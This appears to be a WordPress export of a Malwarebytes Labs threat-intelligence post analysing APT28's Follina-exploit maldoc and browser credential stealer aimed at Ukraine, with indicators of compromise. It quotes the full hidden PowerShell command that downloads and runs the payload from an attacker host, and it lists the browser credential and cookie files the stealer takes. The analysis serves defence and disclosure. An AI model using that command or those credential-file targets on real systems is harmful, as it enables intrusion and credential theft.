{"id":19399,"date":"2022-06-21T08:10:05","date_gmt":"2022-06-21T16:10:05","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/06\/21\/news-13132\/"},"modified":"2022-06-21T08:10:05","modified_gmt":"2022-06-21T16:10:05","slug":"news-13132","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2022\/06\/21\/news-13132\/","title":{"rendered":"Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine"},"content":{"rendered":"

Credit to Author: Threat Intelligence Team| Date: Tue, 21 Jun 2022 15:25:09 +0000<\/strong><\/p>\n

This blog post was authored by Hossein Jazi and Roberto Santos<\/em>.<\/p>\n

In a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.<\/p>\n

APT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and US organizations<\/a>, including US nuclear facilities.<\/p>\n

On June 20, 2022, Malwarebytes Threat Intelligence identified<\/a> a document that had been weaponized with the Follina<\/a> (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by Google<\/a>. The discovery was also made independently by CERT-UA<\/a>.<\/p>\n

Follina is a recently-discovered zero-day exploit that uses the ms-msdt<\/code> protocol to load malicious code from Word documents when they are opened. This is the first time we’ve observed APT28 using Follina in its operations. <\/p>\n

The malicious document<\/h2>\n

The maldoc’s filename, Nuclear Terrorism A Very Real Threat.rtf<\/code>, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict. <\/p>\n

The content of the document is an article from the Atlantic Council<\/a> called “Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions<\/em>” published on May 10 this year.<\/p>\n

\n
\"A<\/a>
The lure asks “Will Putin use nuclear weapons in Ukraine?”<\/figcaption><\/figure>\n<\/div>\n

The maldoc is an RTF file compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the Document.xml.rels<\/code> file to retrieve a remote HTML file from the URL http:\/\/kitten-268.frge.io\/article.html<\/a>.<\/p>\n

\n
\"\"<\/a>
The malicious HTML document<\/figcaption><\/figure>\n<\/div>\n

The HTML file uses a JavaScript call to window.location.href<\/code> to load and execute an encoded PowerShell script using the ms-msdt<\/code> MSProtocol URI scheme. The decoded script uses cmd<\/code> to run PowerShell code that downloads and executes the final payload:<\/p>\n

\"C:WINDOWSsystem32cmd.exe\" \/k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command \"& {iwr http:\/\/kompartpomiar.pl\/grafika\/SQLite.Interop.dll -OutFile \"C:Users$ENV:UserNameSQLite.Interop.dll\";iwr http:\/\/kompartpomiar.pl\/grafika\/docx.exe -OutFile \"C:Users$ENV:UserNamedocx.exe\";Start-Process \"C:Users$ENV:UserNamedocx.exe\"}\"<\/code><\/pre>\n
Payload Analysis<\/h2>\n
The final payload is a variant of a stealer APT28 has used against targets in Ukraine<\/a> before. In the oldest variant, the stealer used a fake error message to hide what it was doing (A secondary thread was displaying this error message while the main program continued executing.) The new variant does not show the popup. <\/p>\n
\n
\"\"
In older versions of the stealer, a fake error message distracted users <\/figcaption><\/figure>\n<\/div>\n
The variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.<\/p>\n
\n
\"A<\/a>
A side-by-side comparison of two versions of the APT28 stealer<\/figcaption><\/figure>\n<\/div>\n
As with the previous variant, the stealer’s main pupose is to steal data from several popular browsers.<\/p>\n
Google Chrome and Microsoft Edge<\/h3>\n
The malware steals any website credentials (username, password, and url) users have saved in the browser by reading the contents of %LOCALAPPDATA%GoogleChromeUser DataDefaultLogin Data<\/code>.<\/p>\n
\n
\"Debugging<\/a>
Debugging session showing how attackers are capable of stealing credentials<\/figcaption><\/figure>\n<\/div>\n
In a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing %LOCALAPPDATA%GoogleChromeUser DataDefaultNetworkCookies<\/code>. <\/p>\n
\n
\"Code<\/a>
Cookie stealing code (Google Chrome)<\/figcaption><\/figure>\n<\/div>\n
Stolen cookies can sometimes be used to break into websites even if the username and password aren’t saved to the browser.<\/p>\n
The code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.<\/p>\n
Firefox<\/h3>\n
This malware can also steal data from Firefox. It does this by iterating through every profile looking for the cookies.sqlite<\/code> file that stores the cookies for each user.<\/p>\n
\n
\"Cookie<\/a>
Sysmon capturing access to cookies.sqlite file<\/figcaption><\/figure>\n<\/div>\n
In the case of passwords, the attackers attempt to steal logins.json<\/code>, key3.db<\/code>, key4.db<\/code>, cert8.db<\/code>, cert9.db<\/code>, signons.sqlite<\/code>.<\/p>\n
\n
\"\"
Attackers will grab also passwords from Firefox<\/figcaption><\/figure>\n<\/div>\n
These files are necessary for recovering elements like saved passwords and certificates. Old versions are also supported (signons.sqlite<\/code>, key3.db<\/code> and cert8.db<\/code> are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.<\/p>\n
Exfiltrating data<\/h2>\n
The malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.<\/p>\n
\n
\"IMAP<\/a>
The IMAP login event<\/figcaption><\/figure>\n<\/div>\n
The old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc[.]com. Interestingly both are located in Dubai.<\/p>\n
It’s likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.<\/p>\n
Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.<\/p>\n
For more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has targeted Russia repeatedly since Ukraine invasion<\/a>.<\/p>\n
Protection<\/h2>\n
Malwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.<\/p>\n
\n
\"\"<\/figure>\n<\/div>\n
IOCs<\/h2>\n
Maldoc:
<\/strong>Nuclear Terrorism A Very Real Threat.rtf
daaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01 <\/p>\n
Remote template (Follina):
<\/strong>http:\/\/kitten-268.frge[.]io\/article.html <\/p>\n
Stealer:
<\/strong>http:\/\/kompartpomiar[.]pl\/grafika\/docx.exe
2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933<\/p>\n
C2:
<\/strong>www.specialityllc[.]com
<\/a><\/p>\n
The post Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine<\/a> appeared first on Malwarebytes Labs<\/a>.<\/p>\n
https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Credit to Author: Threat Intelligence Team| Date: Tue, 21 Jun 2022 15:25:09 +0000<\/strong><\/p>\n
Threat actors associated with Russian intelligence are using the fear or nuclear war to spread data-stealing malware in Ukraine.<\/p>\n
The post Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine<\/a> appeared first on Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[12040],"class_list":["post-19399","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-threat-intelligence"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19399","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=19399"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19399\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=19399"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=19399"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=19399"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}